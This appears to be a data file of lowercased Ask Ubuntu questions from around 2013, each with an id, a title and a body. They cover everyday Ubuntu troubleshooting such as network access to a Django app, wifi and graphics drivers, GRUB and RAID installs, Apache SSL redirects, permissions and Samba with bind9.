263120	how to make resource available to the network ?	i have this building simulator application that uses django . it simulates different actions in a building and you can query it to see what is the temperature inside etc . i set it up on my ubuntu server 12.10 and it is located in my /home/myusername/documents/buildingsimulator directory . it listens on port 8000 so when i open : 127.0.0.1:8000/admin locally , i can see admin panel . when i try to access it form my local network i ca n't . i think that is happening due to the fact that it is located in my /home/myusername directory which is available only to myusername user . where should i put this application so that it can be accessed form anywhere ? or what should i do to make this folder accessible to anybody ? i should add that i have webmin running on port 10000 and it works fine when i access it remotely . here is the output of sudo netstat -tlnp : active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 192.168.122.1:53 0.0.0.0 : * listen 1530/dnsmasq tcp 0 0 192.168.1.39:53 0.0.0.0 : * listen 1252/named tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 1252/named tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 966/sshd tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 749/cupsd tcp 0 0 127.0.0.1:5432 0.0.0.0 : * listen 1500/postgres tcp 0 0 127.0.0.1:953 0.0.0.0 : * listen 1252/named tcp 0 0 0.0.0.0:445 0.0.0.0 : * listen 784/smbd tcp 0 0 127.0.0.1:8000 0.0.0.0 : * listen 13713/python tcp 0 0 0.0.0.0:993 0.0.0.0 : * listen 1256/dovecot tcp 0 0 0.0.0.0:995 0.0.0.0 : * listen 1256/dovecot tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1278/mysqld tcp 0 0 0.0.0.0:139 0.0.0.0 : * listen 784/smbd tcp 0 0 0.0.0.0:110 0.0.0.0 : * listen 1256/dovecot tcp 0 0 0.0.0.0:143 0.0.0.0 : * listen 1256/dovecot tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen 1806/apache2 tcp 0 0 0.0.0.0:10000 0.0.0.0 : * listen 1766/perl tcp 0 0 0.0.0.0:6000 0.0.0.0 : * listen 1713/x tcp6 0 0 : ::21 : : : * listen 2432/proftpd : ( acce tcp6 0 0 : ::53 : : : * listen 1252/named tcp6 0 0 : ::22 : : : * listen 966/sshd tcp6 0 0 : :1:631 : : : * listen 749/cupsd tcp6 0 0 : :1:953 : : : * listen 1252/named tcp6 0 0 : ::445 : : : * listen 784/smbd tcp6 0 0 : ::993 : : : * listen 1256/dovecot tcp6 0 0 : ::995 : : : * listen 1256/dovecot tcp6 0 0 127.0.0.1:8005 : : : * listen 1849/java tcp6 0 0 : ::139 : : : * listen 784/smbd tcp6 0 0 : ::110 : : : * listen 1256/dovecot tcp6 0 0 : ::143 : : : * listen 1256/dovecot tcp6 0 0 : ::8080 : : : * listen 1849/java tcp6 0 0 : ::6000 : : : * listen 1713/x
263122	why ca n't i connect to internet using wifi ?	i 'm using hp compaq nx9600 . i installed ubuntu last night and i only can connect to internet by a wired connection . it does n't let me choose a wifi connection . how do i resolve the issue ?
263123	how to make the facebook webapp work without keeping firefox open ?	i want to have notifications of facebook on the envelop letter of ununtu desktop ( i know i 'm not using the correct names , but i 've been using ubuntu since a week ) . i looked up for programs like fbuntu but is not working in 12.10 . i installed the web app , but it only shows me the chat and notifications when facebook is open with the browser ( firefox ) . ca n't i see that information when firefox is closed ? or does there exist any other way of doing this ?
263125	ubuntu 12.04 - wireless is not configured when i dont use wired connection	wireless is not detecting in my ubuntu when i dont use wired connection . during startup it shows below message : '' waiting for network configuration '' then : '' waiting an additional 60 seconds for network configuration '' and then system boot up without network configuration even wireless does not work in this case . please find below my system detail : my system info
263126	unable to install skype due to `` libxss1 not satisfiable '' error	i 'm in the uae , so i can not install skype from the software center . i made my friend upload a deb file and i downloaded it . i ran it with gdebi package installer and i get the error : libxss1 not satisfiable i tried to install the libxss1 : sudo apt-get install libxss1 reading package lists ... done building dependency tree reading state information ... done package libxss1 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libxss1 ' has no installation candidate
263128	installing 12.04lts server on a fake raid10	scenario install ubuntu 12.04lts server on a raid10 with boot on a raid1 . 4 - 2tb sata hard drives 3 partitions ( /boot , / , and swap ) boot ( 256mb from each disk ) setup in raid1 /dev/md0 partition is ext2 /dev/md0p1 should be where boot is loaded swap and root partition ( remaining disk space ) setup in raid10 /dev/md1 swap partition - 8gb partition of raid10 , linux-swap /dev/md1p1 root partition - remaining space of raid10 - gpt partition table , ext2 /dev/md1p2 we 've setup our disks and raid configurations using mdadm , fdisk , and parted while running the ubuntu 12.04lts server trial from a thumb-drive . installation fails at grub . i ca n't get past this . on one machine it fails at grub-dummy-install , and on the other it simply fails with grub . the latter of the machines has completed installation but asks to install bootloader at different location or not at all . installer becomes unresponsive though if you choose `` install at different location '' . goal we want the os loaded on the raid10 but we want to make sure that if any drive fails the machine can still boot from /boot and find the os on the raid10 . what we know the alternative installer supports raid10 configuration at installation , but does it achieve our goal without taking the same process in setting up the disks ? we know we should see our raids in /dev/mapper/ { array-name } but we do n't , we only see control . this info i 've gathered from this previous question we followed instructions we 've found here and here what we do n't know is there a better way to do this and still achieve our goal ? why we 're not seeing our disks in /dev/mapper/ most importantly : why we ca n't install the boot-loader to our /boot partition , namely /dev/md0p1 at installation . updates we 're trying this out simultaneously on two machines . one gets this error `` executing 'grub-install-dummy ' failed . this is a fatal error '' and the other gets `` executing 'grub-install /dev/sda ' failed . this is a fatal error '' i 'm under the impression that these are errors related to different portions of installing grub . any ideas ?
263129	is there a patch for vulnerability in recent linux kernels that offers root rights	an error in the handling of special netlink messages in the linux kernel can allow a user to surreptitiously gain root privileges . to read the rest of the article , please click the following link : http : //www.h-online.com/security/news/item/vulnerability-in-recent-linux-kernels-offers-root-rights-1810597.html my question is : has a patch been issued for ubuntu 12.04 and 12.10 ?
263130	nexus 7 wo n't start when i format a partition as `` ms-dos ''	i put ubuntu 12.10 onto my nexus 7 just to see what it looks like . i noticed that i only had 6 gb of space of storage even though i have a 32 gb tablet . so i downloaded gparted and tried to edit the partition but noticed that there was no partition and it told me i need to create a partitioning table . i do not know much about harddrives so i decided to create one to see if it fixes my problem . so i created an `` ms-dos '' partitioning table and rebooted my device . it will not start . it just stays at a black screen and does nothing . i have tried these commands : '' sudo fastboot reboot '' -result : stuck at waiting for device '' sudo fastboot reset '' -result : stuck at waiting for device note : i can not get a replacement and i need to get this fixed . i am willing to erase everything on my tablet if i need to .
263132	how to force ssl with default-ssl without dns ?	i know this has been covered everywhere , and i 've actually made this work on another server , but i ca n't seem to get it to work . i have this rewriteengine on rewritecond % { https } ! =on rewriterule ^ ( . * ) $ https : // % { server_name } % { request_uri } [ l , r ] currently in /etc/apache2/conf.d/site.conf . no go . i also tried it in /var/www/.htaccess . no go . i could n't even get an improperly formatted /var/www/.htaccess to cause 500 error . ( does a setting have to be changed to use .htaccess ? ) i am not using a domain name , and i 'm using a2ensite default-ssl . spdy & fastcgi i do n't know if this matters , but i installed spdy per these instructions http : //www.howtoforge.com/using-mod_spdy-with-apache2-on-ubuntu-12.10 and fastcgi by apt-get install libapache2-mod-fastcgi , a2enmod actions fastcgi alias , and services apache2 restart .
263137	how do i boot ubuntu off a dvd ?	i 've burnt the ubuntu 12.10 image onto a dvd and i 'm not sure what to do next . how do i boot off of it and can i go back to windows 7 when i 'm done with ubuntu ? i used this as my tutorial : http : //www.ubuntu.com/download/help/burn-a-dvd-on-windows can anyone help me ?
263141	integrated webcam on a dell v131 drains the battery when not used . how to turn it off ?	after using the integrated webcam , it never fully turns off and keeps hogging the battery . from powertop : the battery reports a discharge rate of 22.6 w the estimated remaining time is 0 hours , 41 minutes summary : 369.6 wakeups/second , 60.7 gpu ops/seconds , 0.0 vfs ops/sec and 7.9 % cpu use usage events/s category description 100.0 % device usb device : laptop_integrated_webcam_hd ( cn0t3npc724871bbk5p1a00 ) 11.8 % device display backlight 5.7 ms/s 58.1 process /usr/bin/pulseaudio -- start -- log-target=syslog how can i properly turn it off ? all the tunables are `` good . '' it 's a dell v131 . i do n't know about the camera . this is the only device i can not account for in lsusb output : # lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 8086:0189 intel corp. **bus 001 device 004 : id 1bcf:2880 sunplus innovation technology inc.** bus 002 device 003 : id 138a:0011 validity sensors , inc. vfs5011 fingerprint reader
263142	how can i run a kernel prior to 2.0 ?	i am working on a project i.e . trying to adapt linux kernel for scalable multi core architecture where no . of cores are increasing day by day . for my project i want a linux distribution like ubuntu having linux kernel before 2.0 release i.e . it may be ubuntu having linux kernel 1.3 release , where can i get this , if possible please try to help me as much as possible .
263145	move files from one folder to another with same name	i 'm new to linux , especially for ubuntu server and it 's terminal ... . i have such file structure : -im | |-t1 |-1.jpg |-t2 |-2.jpg |-second |-t1 |-3.jpg |-t2 |-4.jpg how can i move from second files to main folder , so that t1 contain 1,3.jpg and t2 contain 2,4.jpg ... ? so that nothing in t1 and t2 to delete , but second subfolder is moved here ... . will be all ok with mv command ?
263151	passwd problem ubuntu 12.04	i 'm running ubuntu server 12.04 lts and since the latest update of the passwd program i ca n't logon to the system anymore . if i enter a vaild user password the system shows me the login dialog again or closes the connection if i try to logon using ssh . if i enter a wrong password the system reacts as usual . the only way to get access to a shell is to boot into the recovery mode . moreover if i enter passwd or passwd < username > in the recorvery mode root shell the passwd application simply closes itself . what can i do to solve this problem ? i thought about compiling the program and trying the self-compiled version .
263152	what are the consequences laptop running out power while gparted is running ?	i was fixing my partition with gparted and it seemed to work well . but , my laptop suddenly ran out of power and i did n't realize it , then it turned off while gparted was still running which was at the part it is copying 2mb per second ( on /dev/sda8 ) then , i plugged in battery cable and checked . all system seems normal . my question is : since there is no important data in /dev/sda8 , will any problems arise because of what happened ? i already checked all the data in /dev/sda8 , and there is no corrupted data . output of sudo fdisk -l : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00075eb1 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 212719615 106256384 7 hpfs/ntfs/exfat /dev/sda3 212721664 1953519615 870398976 5 extended /dev/sda5 212725760 410556415 98915328 83 linux /dev/sda6 1937895424 1953519615 7812096 82 linux swap / solaris /dev/sda7 410560512 508213247 48826368 83 linux /dev/sda8 508215296 1937888819 714836762 7 hpfs/ntfs/exfat partition table entries are not in disk order gives no error/warning messages screenshot of my partition table with gparted + details on un-allocated data : ubuntu 12.04 lts 64 bit running gparted with live usb
263155	changing a ppa from dev to stable safely	ubuntu comes with firefox ( stable ) built-in . i wanted to try aurora , so i added ppa : ubuntu-mozilla-daily/firefox-aurora to the source list and upgraded this way : sudo add-apt-repository ppa : ubuntu-mozilla-daily/firefox-aurora sudo apt-get update sudo apt-get upgrade now let us suppose that i want to go back to the stable version of firefox , what would be the safest way to do so ? thank you . edit : as pointed out by @ vasa1 , i am not talking specifically about firefox , but about the concept of going back to a lesser version in general . i have google-chrome installed so i guess , ubuntu will one end up browserless . problem solved using @ ignite 's solution .
263159	how do i get a radeon 9200 pro graphic card recognized and working ?	this question is an extension of another a few days ago : video card not found first i try to install ubuntu 12.10 desktop removing windows xp home edition . everything was nearly ok , just that graphic card was n't found , so i try to update it . after that , i try to install ubuntu 12.04 desktop and still no graphic card found . after i try 11.10 desktop , but still nothing and something that i do n't know why , it never boot normaly from hd ? ! booting from hd after all it comes with a purple screen with those options : ubuntu , ubuntu recovery mode , memory test and one more memory test ubuntu 11.10 desktop just can be boot from usb ? well all those re-install that i make was erasing and reinstall ! my pc : windows xp home hardware info : bios version : p4vm8 bios p1.30 processor type : intel ( r ) pentium ( r ) 4cpu 2.66ghz processor speed : 2666mhz graphics chipset : ati/techologies inc rv280 [ radeon 9200 pro ] microcode update : f29/2e cache size : 512kb so now i just do n't know how to fix it and what to do ! i want my pc to run only ubuntu because it 's nice , fast and better then all os i tried .
263160	trying to have a group be able to read/write to a directory	first i 'm a newbie - i 'm using a bitnami stack to deploy a rails app . bitnami has the rails applications in /opt/bitnami/projects . i created a group called deployers . my login is bitnami . so , i added bitnami to deployers ( i 'm the only developer right now ) . so , whoami = bitnami groups bitnami = bitnami : bitnami adm dialout cdrom floppy audio dip video plugdev admin deployers then i ran these commands : sudo chown -r root : deployers projects sudo chmod -r 0766 projects i thought those commands would give bitnami in group deployers the read/write access i need . but , now i ca n't even cd projects . i get bash : cd : projects : permission denied . the permissions on the projects directory look like this : projects directory drwxrw-rw- root deployers how do i fix it ?
263162	how do i remove the 'write the changes to the disks ? ' question during preseed ?	i am pretty new to ubuntu and linux . i have spent a lot of time trying to get an unattended install up and running for my headless server . as it stands i have everything almost there but when testing on virtuabox my install asks a question at partitioning 'write the changes to the disks ? ' my preseed looks like this # echo 'd-i partman/confirm_write_new_label boolean true d-i partman/choose_partition \ select finish partitioning and write changes to disk d-i partman/confirm boolean trued-i partman/confirm_write_new_label boolean true ' > ks.preseed i could really use some help on this . so close now
263167	can i tell empathy to notify me when a given contact connects ?	say i 'm waiting for my contact emma goldman to log in . i would then like empathy to issue a desktop notification as soon as it happens . and optionally not again the next time emma logs on . is there a plug-in or something to enable empathy to notify when that happens ? if there is no such functionality implemented anywhere , can i do it myself ? if yes , could anyone just give me a hint on where to start ?
263169	why is the rating tab in vlc not working ?	i ca n't assign ratings ! what is the rating tab for ? it has always been blank and does n't change . edit : sorry for omitting the details . please do n't criticize my choice of music . ca n't do anything to the ratings , for any kind of media file . proof that i 'm using ubuntu -- apparently , my coming to this forum is not sufficient to infer this .
263171	hardware acceleration and webgl not working on intel g33	i have an intel g33 board with ubuntu 12.04 lts on it , i noticed in firefox that webgl and hardware accelaration is disable due to driver issues , since i am certainly not a pro in linux , is there an easy way to make them run ? web browser is running ( crawling ) like a snail .
263172	necessary to increase size ?	i used the windows installer to install ubuntu 12.10 64 bit . the pc also has vista ultimate 32 bit . in any case , i recall that one of the question asked was where and how much space to provide for ubuntu installation , which i think i allocated 10 gb on a pretty large partition . is there a way to allocate more than 10 gb now that ubuntu is installed ? if so , how ? thanks .
263173	harddisc clone vs fresh install	in terms of stability and performance , is it better to clone the entire hdd to a new computer or start with a fresh install ? btw , much of my production software is in a virtual machine , which can be easily moved.but still , my ubuntu baremetal install ( non virtual ) is highly customized and tweaked .
263174	nvidia drivers on ubuntu 12.10	i followed instructions to install nvidia drivers found here : nvidia driver does n't work in 12.10 but it does n't work for me . same problem like in the question above : no dash and windows do n't have borders . i tried opening nvidia-xsetting , which asked me to run nvidia-xconfig . running that did nothing but generate a broken xorg.conf which i had to remove because of really low resolution . i thought this is `` unity not loading problem '' but instead this seems to be `` driver not loading problem '' because nvidia-xsetting said that i do n't use nvidia drivers ( which btw i find really weird because lsmod says nvidia kernel module is indeed loaded ) , and games did n't load either . i can `` fix '' this by doing modprobe nouveau , but with nouveau 3d games like 0 a.d. are broken . any ideas ? i 'm out of them .
263176	graphics drivers ubuntu 12.04 - not recognized ; overheating	i have recently installed ubuntu 12.04 lts and i keep having terrible problems with overheating which i think are caused by problems with graphics chip drivers . i have a asus u80v laptop supposedly with radeon hd4570 . when i check the system details the graphics section says `` unknown '' . the additional drivers app does not offer installing any proprietary drivers . i am a rather unexperienced user when it comes to linux , so i would appreciate any help and preferably any suggestion that my understanding would keep up to .
263177	how do i install ubuntu on to a blank laptop	i downloaded ubuntu to one laptop and burned it to a blank dvd . then i put the cd to the blank laptop on start up and nothing happens . there was no windows image disc burner software on the laptop . what do i do ? thanks .
263179	get rid of kvm : disabled by bios	i 'm getting a message : kvm : disabled by bios after upgrading my kernel to 3.8.x . i 've never installed kvm package.neither i can enable virtualization from my bios , because of a bios bug . i wish i just get rid of this weird message . tried removing any kernel module using modprobe but it did n't work .
263180	how to change autodim time	i 'm running unity on 12.04 precise . settings > brightness & lock lets me control whether the screen dims to save power , but not to control how long to wait before dimming . how do i do that ?
263186	ca n't resize partition during installation	i want to dual boot windows 7/ubuntu . i have installed gparted , but i ca n't make a partion because i ca n't click on the option to resize . how do i work around this ? also . tried putting windows 7 disc in , says can not resize and can only install by deleting ubuntu off it .
263187	display goes off after livewallpapper installation	after installing livewallpaper on 12.10 my screen has been constantly turrning off , i have uninstalled it , but the problem still occurs .
263189	1 suspicious file with size 140tb ?	solved please see the bottom answer for my solution after i use gparted to fix my partition ( gparted ran well but my laptop shutt down because it ran out battery power and did n't finish the process copying my other partition , details ) , i notice that i got 10gb increase in my ubuntu partition , then i checked and found 1 suspicious file with size 140tb in /proc ... is this a problem ? ubuntu 12.04 lts 64bit update i hope these details can help sudo fdisk -l output disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00075eb1 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 212719615 106256384 7 hpfs/ntfs/exfat /dev/sda3 212721664 1953519615 870398976 5 extended /dev/sda5 212725760 410556415 98915328 83 linux /dev/sda6 1937895424 1953519615 7812096 82 linux swap / solaris /dev/sda7 410560512 508213247 48826368 83 linux /dev/sda8 508215296 1937888819 714836762 7 hpfs/ntfs/exfat partition table entries are not in disk order added i think the sudden increase 10gb in my ubuntu partition is because unfinished gparted process , i currently have 27gb in used ( when i right click in filesystem then check properties ) , but disk analyzer says another thing ( it says i am only using 12-13gb )
263191	what ubuntu for windows xp	i have windows xp 2002 service pack 3 and want to install a newer version of ubuntu . i have a pentium 4 cpu 2.80ghz , 2.00 gb of ram which ubuntu should i install ?
263193	ibus package not found while trying to build gnome-settings-daemon	i 'm currently trying to build gnome-settings-daemon from the upstream source . i first cloned the package using git clone git : //git.gnome.org/gnome-settings-daemon then navigated into the directory and started the build process with ./autogen however , i ended up with the following error : checking for keyboard ... no configure : error : package requirements ( xkbfile ibus-1.0 > = 1.4.99 gnome-desktop-3.0 > = 3.7.90 ) were not met : no package 'ibus-1.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables keyboard_cflags and keyboard_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . i have the ibus and ibus-gtk3 packages installed , so i 'm not sure what the actual problem is .
263195	show available/installed version in the output of apt-cache	i read about this q & a : show available/installed version in the output of aptitude search . my question is , how do i search by name not by terms ? should i change apt-cache search $ terms to apt-cache search $ name ? i tried change it but its not working . hope someone can help me .
263198	ubuntu runs hotter than windows 7	so i am running ubuntu 12.10 on an hp g6 that has intel hd graphics and i5-2430m processor . not sure why but ubuntu runs hotter than windows 7 by a lot . i dont see what the problem could be though .
263202	instal ubuntu 12.04 lts and now boot from hdd ?	i installed ubuntu 12.04 lts on my computer and have now booted from hdd . then i got a purple page saying `` gnu grub version 1.99-21ubuntu3,9 '' and i have the following options : ubuntu , with linux 3.5.0-23-generic , ubuntu , with linux 3.5.0-23-generic ( recovery mode ) previous linux version memory test ( memtest 86+ ) memory test ( memtest 86+ , serial console 1152000 ) which one is the right to boot my newly installed ubuntu system ?
263206	ubuntu 12.04 , unity launcher missing	i am new user i just messed up some option in compiz config manager and it has to do with unity . i was on compizconfigsettings manager menu and i clicked one of the options and whole unity tray gone ! i also ca n't se time and date . so basically since i installed it yesterday i do n't know about shortcuts in ubuntu and how to restart it . basically i am stuck on desktop background , it is only thing i can see.i managed to run nautilus and access the web browser . so if somebody can tell me how to access terminal or to restart unity ( if i only can see dash or terminal ) .
263208	proprietory drives for ubuntu 12.04 intel 3000 hd graphics	i am trying find out if you can install updated drivers for intel 3000 hd graphic card . i 'm been hearing intel graphics do n't really have proprirtory drivers and they are open source versions . then , how can i improve my graphics with my current graphics card ?
263216	samsung galaxy s3 with easy install ubuntu 12.04 can i use aircrack-ng ?	this is the easiest way i 've gotten ubuntu to work on the galaxy s3 . can i put it in monitor mode ? i have a external wireless card to use alfa card with the 5 pin usb female to usb adapter . i know the copy of ubuntu i have has reaver already installed but nothing for aircrack . is aircrack the only way to go
263217	what to do on ubuntu grub screen ?	installed ubuntu 12.04 lts and now boot from hdd . now come that purple page `` gnu grub version 1.99-21ubuntu3.9 '' and the options are : ubuntu , with linux 3.5.0-23-generic ubuntu , with linux 3.5.0-23-generic ( recovery mode ) previous linux version memory test ( memtest 86+ ) memory test ( memtest 86+ , serial console 1152000 ) so can someone told me what to do ?
263223	how to analyze why `` try ubuntu '' does not launch ?	i downloaded the latest version of ubuntu desktop for i386 since i like to run it on an older computer which does not support 64bit . i successfully following this tutorial on how to create a bootable usb stick . the computer boots the stick as expected and stops to let me choose between try ubuntu and install ubuntu as shown in the screenshot below . i have chosen the try ubuntu option . the option dialog disappears as the menu bar does . i waited for more then two hours but all i see is the background image and the mouse cursor which can be moved . when i press the power switch on the computer a menu pops up which offers me options to either shutdown or restart the computer . how can i analyze the boot process in order to find out why the try ubuntu feature does not work ?
263224	tor browser : vidalia exited abnormally . exit code : 139 ( 32 bit )	i downloaded tor browser bundle ( tor-browser-gnu-linux-i686-2.3.25-4-dev-en-us ) for 32-bit linux . whenever i start to run it on my ubuntu 12.04 os it shows me ; vidalia exited abnormally . exit code : 139 and i tried to do following things by reading another post about same problem . run tor successfully in debug mode in by opening a terminal in the tor folder and running : ./start-tor-browser -- debug it shows in terminal like meraj @ meruz : ~/desktop/upload/tor-browser_en-us $ ./start-tor-browser -- debug debug enabled . starting vidalia now launching vidalia from : /home/meraj/desktop/upload/tor-browser_en-us segmentation fault ( core dumped ) vidalia exited with the following return code : 139 meraj @ meruz : ~/desktop/upload/tor-browser_en-us $ i dont know what to do . please help .
263234	which kernel does 12.10 require ?	earlier this week software updater installed linux-image 3.5.0.26 which caused my 2 systems to become extremely unstable . i have locked in grub the version i 'm using to 3.5.0.24 . today software updated informed about security upgrades . how can i determine whether the security updates will install on the selected kernel , or whether a new kernel will be downloaded ? $ uname -a linux pfeiffep-hpe-580t 3.5.0-24-generic # 37-ubuntu smp thu feb 7 01:50:30 utc 2013 x86_64 x86_64 x86_64 gnu/linux apt-cache policy linux-image linux-image : installed : ( none ) candidate : 3.5.0.25.31 is this indicative that 3.5.0.24 is currently installed ? will the security patches be installed on 3.5.0.24 ?
263240	howto install compiled package	i compiled an upgraded source for a lesser package already installed . how do i use dpkg or another to install and let the system upgrade system know about it in system : hdf5-tools 1.8.8-9 compiled : hdf5-1.9.145 do i just make install as root or use a system package like dpkg ?
263242	gnome 3 on 12.10 notification panel disables bottom of screen	i ca n't cilck on anything in the bottom 2cm of my screen , which i think is due to the gnome notification panel - how can i disable this or stop it deactivating my screen ?
263248	set hdmi sound output automatically on connect/disconnect	i have a dual screen setup on my laptop ( using 12.04 lts ) using a hdmi connected display . everything works fine , but everytime i connect/disconnect the cable i have to go to sound preferences and change the sound output device manually . is there any way to change the sound output device on connect/disconnection of cable , so when i connect my display the sound output is set to hdmi and when i disconnect it the sound goes back to laptop speakers ?
263250	why wo n't bind9 start with samba 4 ad dc ?	i followed this guide to install samba 4 as an active directory domain controller and got stuck on starting bind9 . here are some important configuration files and logs . tail /var/log/syslog : mar 2 23:02:11 mail named [ 3552 ] : listening on ipv4 interface eth0 , 31.31.79.102 # 53 mar 2 23:02:11 mail named [ 3552 ] : generating session key for dynamic dns mar 2 23:02:11 mail named [ 3552 ] : sizing zone task pool based on 5 zones mar 2 23:02:11 mail named [ 3552 ] : loading 'ad dns zone ' using driver dlopen mar 2 23:02:11 mail named [ 3552 ] : samba_dlz : failed to connect to /var/lib/samba/private/dns/sam.ldb mar 2 23:02:11 mail named [ 3552 ] : dlz_dlopen of 'ad dns zone ' failed mar 2 23:02:11 mail named [ 3552 ] : sdlz driver failed to load . mar 2 23:02:11 mail named [ 3552 ] : dlz driver failed to load . mar 2 23:02:11 mail named [ 3552 ] : loading configuration : failure mar 2 23:02:11 mail named [ 3552 ] : exiting ( due to fatal error ) ls -l /var/lib/samba/private/dns/ : total 144 -rwxrwxrwx 1 root memcache 143360 mar 2 15:25 sam.ldb drwxrwxrwx 2 root memcache 4096 mar 2 15:25 sam.ldb.d cat /etc/apparmor.d/usr.sbin.named : # vim : syntax=apparmor # last modified : fri jun 1 16:43:22 2007 # include < tunables/global > /usr/sbin/named { # include < abstractions/base > # include < abstractions/nameservice > capability net_bind_service , capability setgid , capability setuid , capability sys_chroot , capability sys_resource , # /etc/bind should be read-only for bind # /var/lib/bind is for dynamically updated zone ( and journal ) files . # /var/cache/bind is for slave/stub data , since we 're not the origin of it . # see /usr/share/doc/bind9/readme.debian.gz /etc/bind/** r , /var/lib/bind/** rw , /var/lib/bind/ rw , /var/cache/bind/** rw , /var/cache/bind/ rw , # gssapi /etc/krb5.keytab kr , /etc/bind/krb5.keytab kr , # ssl /etc/ssl/openssl.cnf r , # dnscvsutil package /var/lib/dnscvsutil/compiled/** rw , /proc/net/if_inet6 r , /proc/*/net/if_inet6 r , /usr/sbin/named mr , / { , var/ } run/named/named.pid w , / { , var/ } run/named/session.key w , # support for resolvconf / { , var/ } run/named/named.options r , # some people like to put logs in /var/log/named/ instead of having # syslog do the heavy lifting . /var/log/named/** rw , /var/log/named/ rw , # site-specific additions and overrides . see local/readme for details . # include < local/usr.sbin.named > /var/lib/samba/private/** rkw , /var/lib/samba/private/dns/** rkw , /usr/lib/x86_64-linux-gnu/samba/bind9/** rm , /usr/lib/x86_64-linux-gnu/samba/gensec/** rm , /usr/lib/x86_64-linux-gnu/ldb/modules/ldb/** rm , /usr/lib/x86_64-linux-gnu/samba/ldb/** rm , /usr/lib/x86_64-linux-gnu/plugin/krb5/** rm , } /etc/init.d/apparmor reload : * reloading apparmor profiles skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd [ ok ] service bind9 start : * starting domain name service ... bind9 [ fail ]
263251	attempt to install ubuntu 12.10 from windows but get grub instead	i have a ubuntu iso that i have just downloaded from ubuntu.com and used the windows installer ( wubi ) to install ubuntu , but when it boots , instead of ubuntu i get some grub ... something . i have looked at this question and attempted to follow the answer 's advice , but all i 've gotten back from attempting to use ls on any of the partitions is `` unknown filesystem '' . the other commands do nothing or complain about not being given arguments ( i have no idea what arguments to give them and grub does n't explain ) . i have windows 7 x64 , attempted to install ubuntu 12.10 x64 , and the hard drive is ntfs . what am i supposed to do to get ubuntu from here ? please note that i currently have absolutely no removable storage whatsoever , so there will be no booting from dvd for me .
263253	will google chrome update itself considering that it has been downloaded as a standalone .deb file ?	i guess my question applies to software in general . sometimes software is only available through .deb files , or sometimes up-to-date software is only available through downloaded .deb files , so will i lose automatic updating capabilities ?
263254	sluggish performance on lenovo u410 ... display driver issue ?	i just installed ubuntu 12.10 on my lenovo u410 laptop . this system runs windows 8 very well , it is only a few months old , but ubuntu runs sluggish as heck ( chrome takes about 15s to open ... instant open in windows ) . on my desktop , i had to get nvidia drivers going before i saw ok performance . on this laptop , my video card is registered as unknown . this laptop has a hybrid card a nvidia 610m + intel hd 4000 graphics . i 've tried to read up on what driver to install , but i am getting conflicting reports . and i do n't want to brick the install like i did on my desktop ( wrong driver = no desktop at all ) . should i be looking at the intel driver for the 4000 graphics or the nvidia driver for the 610m ?
263255	what is the right way to shutdown ubuntu using the command line ?	i know that there are several commands that shutdown an ubuntu computer . i was just wondering if there is a right one to use and what the implications are for using the other ones ; or what the various scenarios are for using each of the available commands and their parameters .
263262	can i make a second startup usb by simply coping the contents of existing one ?	i 'm trying to setup a bootable firewire device . for some reason the startup disk creator keeps crashing . i already have a bootable usb . can i just copy and paste the files from the usb to the firewire device ? or is there something else that the startup disk creator does ?
263263	how to remove borders around windows when pressing alt+tab in ubuntu 12.04	when i press alt+tab for switching windows in ubuntu 12.04 the outlines of selected windows appear . is there a way to remove these frame outline ? i can not add screenshots because when i press prtsc and release it for saving , outlines are disappearing . sorry for my english .
263264	trying to flash ubuntu touch preview to galaxy nexus	i 'm trying to flash the ubuntu touch preview onto my galaxy nexus , but when i go and type in the command to flash it over , it just tells me that my device is not supported because it 's a `` toro '' . is there a way to fix that ? i 've tried flashing takju over to it , but i always get adb errors and whatnot . can anyone point me in the right direction ?
263267	is there a way to group contacts by im protocol in empathy ?	just installed ubuntu after a very long break of several years . i see that empathy is the new deal for messsaging . but all the contacts are messed up . no protocol icons what-so-ever . i just need to group them by protocol . is n't there a way to do this besides grouping them by hand ?
263268	help installing ubuntu alongside mac in an external drive ( using refit )	i want to install ubuntu on an external usb hard drive ( in a blank partition already made in mac ) and then use refit to alternate between operating systems . the problem is that , when running the instalation program ( install ubuntu 12.10 ) i am asked the next : `` device for boot loader instalation '' . and i get the next options : /dev/sda ata wdc wd3200aajs-4 ( 320.1 gb ) ( internal ) /dev/sda1 /dev/sdc wd 5000aav external ( 500.1 gb ) ( external ) /dev/sdc1 what option should i select ?
263273	lock some version so that it is not updated again	i have to install adobe flash player , each time firefox is updated . i am tired of this ... . hectic work . please tell me how to prevent firefox from being updated by update-manager .
263278	slow internet speed on ubuntu 12.10	i installed ubuntu to dual boot with windows 8 . the installation went ok , but when i began downloading software , say games on steam , the download speed fluctuated between zero and several hundred kilobytes . on windows , download speeds are 1.8 mb/s . i 'm on wifi and my specs are : cpu : amd a6_4455m apu with radeon hd graphics @ 2.10 ghz . ram : 4.00 gb how can i increase my speeds ?
